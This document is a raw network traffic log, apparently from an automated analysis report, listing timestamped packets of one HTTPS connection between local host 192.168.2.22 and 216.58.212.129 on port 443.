                                                                                                                                                                        Oct 23, 2024 17:26:59.669797897 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.676491022 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.677074909 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.677092075 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:59.677103043 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.677115917 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.677452087 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:59.688131094 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.688162088 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.688277006 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:59.688288927 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.688301086 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.688385010 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:59.688401937 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.688433886 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.688460112 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.688522100 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:59.688530922 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.688587904 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:59.688935995 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.688980103 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.689002991 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.689026117 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:59.689033031 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.689253092 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:59.729270935 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.729322910 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.729345083 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.729368925 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.729470968 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.729496002 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.729521036 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.729537010 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:59.729562044 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.729578972 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:59.729614019 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:59.729621887 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.772469044 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.772630930 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:59.772656918 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.786601067 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.786770105 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:59.786793947 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.793695927 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.793800116 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:59.793821096 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.794872046 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.794935942 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:59.794945955 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.805464029 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.805495024 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.805562973 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.805591106 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.805629969 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:59.805644989 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.805660963 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:59.805813074 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.805835962 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.805862904 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:59.805871964 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.805922031 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:59.805955887 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.805991888 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.806030035 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:59.806037903 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.806822062 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.806843996 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.806871891 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:59.806879997 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.806936026 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:26:59.807105064 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:26:59.846532106 CEST44349172216.58.212.129192.168.2.22
Timestamp                             Source Port  Dest Port  Source IP       Dest IP
Oct 23, 2024 17:26:59.846596003 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.846597910 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.846611023 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.846645117 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.846657038 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.846687078 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.846712112 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.846723080 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.846730947 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.846771955 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.846777916 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.889311075 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.889463902 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.889488935 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.903712988 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.903970003 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.903994083 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.910765886 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.910875082 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.910898924 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.911247015 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.911292076 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.911300898 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.923139095 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.923171043 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.923238039 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.923260927 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.923331976 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.923362970 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.923384905 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.923398018 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.923413992 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.923438072 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.923536062 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.923588991 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.923599005 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.923751116 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.923782110 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.923804998 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.923813105 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.923857927 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.923865080 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.924746990 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.924854040 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.924865961 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.963512897 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.963548899 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.963583946 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.963716984 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.963737965 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.963813066 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.964000940 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.964009047 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.964133978 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.964159012 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.964195013 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.964204073 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:26:59.964251995 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:26:59.964277983 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.006697893 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.006880045 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.006901979 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.020672083 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.020701885 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.020932913 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.020946980 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.028017998 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.028106928 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.028120995 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.028321028 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.028374910 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.028384924 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.040435076 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.040477991 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.040523052 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.040556908 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.040595055 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.040607929 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.040635109 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.040757895 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.040757895 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.040808916 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.040887117 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.040939093 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.040947914 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.041043997 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.041070938 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.041095972 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.041104078 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.041152000 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.041806936 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.080794096 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.080847025 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.080882072 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.080905914 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.080934048 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.080956936 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.080995083 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.081087112 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.081087112 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.081109047 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.081157923 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.081202984 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.081294060 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.081347942 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.081356049 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.123658895 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.123713017 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.123742104 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.123769045 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.123848915 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.123868942 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.123882055 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.137864113 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.138117075 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.138134003 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.145881891 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.145921946 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.145946980 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.145962000 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.145979881 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.145993948 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.157484055 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.157555103 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.157587051 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.157601118 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.157773972 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.157780886 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.157922029 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.157973051 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.157978058 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.158374071 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.158406973 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.158431053 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.158437967 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.158488035 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.158627033 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.158670902 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.158715963 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.158724070 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.158818007 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.158849955 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.158864021 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.158883095 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.158936977 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.197657108 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.197720051 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.197746992 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.197776079 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.197817087 CEST  443          49172      216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.197957993 CEST  49172        443        192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.197957993 CEST  49172        443        192.168.2.22    216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.197981119 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.198117971 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.198167086 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.198174000 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.198333025 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.198389053 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.198401928 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.240688086 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.240721941 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.240751028 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.240859985 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.240883112 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.241014957 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.254937887 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.254991055 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.255230904 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.255248070 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.263160944 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.263194084 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.263295889 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.263326883 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.263336897 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.263353109 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.263369083 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.274599075 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.274662018 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.274692059 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.274723053 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.274751902 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.274777889 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.274796963 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.274812937 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.275161982 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.275208950 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.275223970 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.275234938 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.275285959 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.275388002 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.275506020 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.275562048 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.275569916 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.276016951 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.276076078 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.276078939 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.276088953 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.276144981 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.314918995 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.314990997 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.315022945 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.315052032 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.315085888 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.315129042 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.315128088 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.315150976 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.315165997 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.315196037 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.315203905 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.315675974 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.315732002 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.315742970 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.315917969 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.315969944 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.315978050 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.357808113 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.357848883 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.357887030 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.358002901 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.358036041 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.358091116 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.371969938 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.380234003 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.380261898 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.380295992 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.380291939 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.380328894 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.380350113 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.380376101 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.380403042 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.380424976 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.380431890 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.380475998 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.391472101 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.391752005 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.391777039 CEST44349172216.58.212.129192.168.2.22
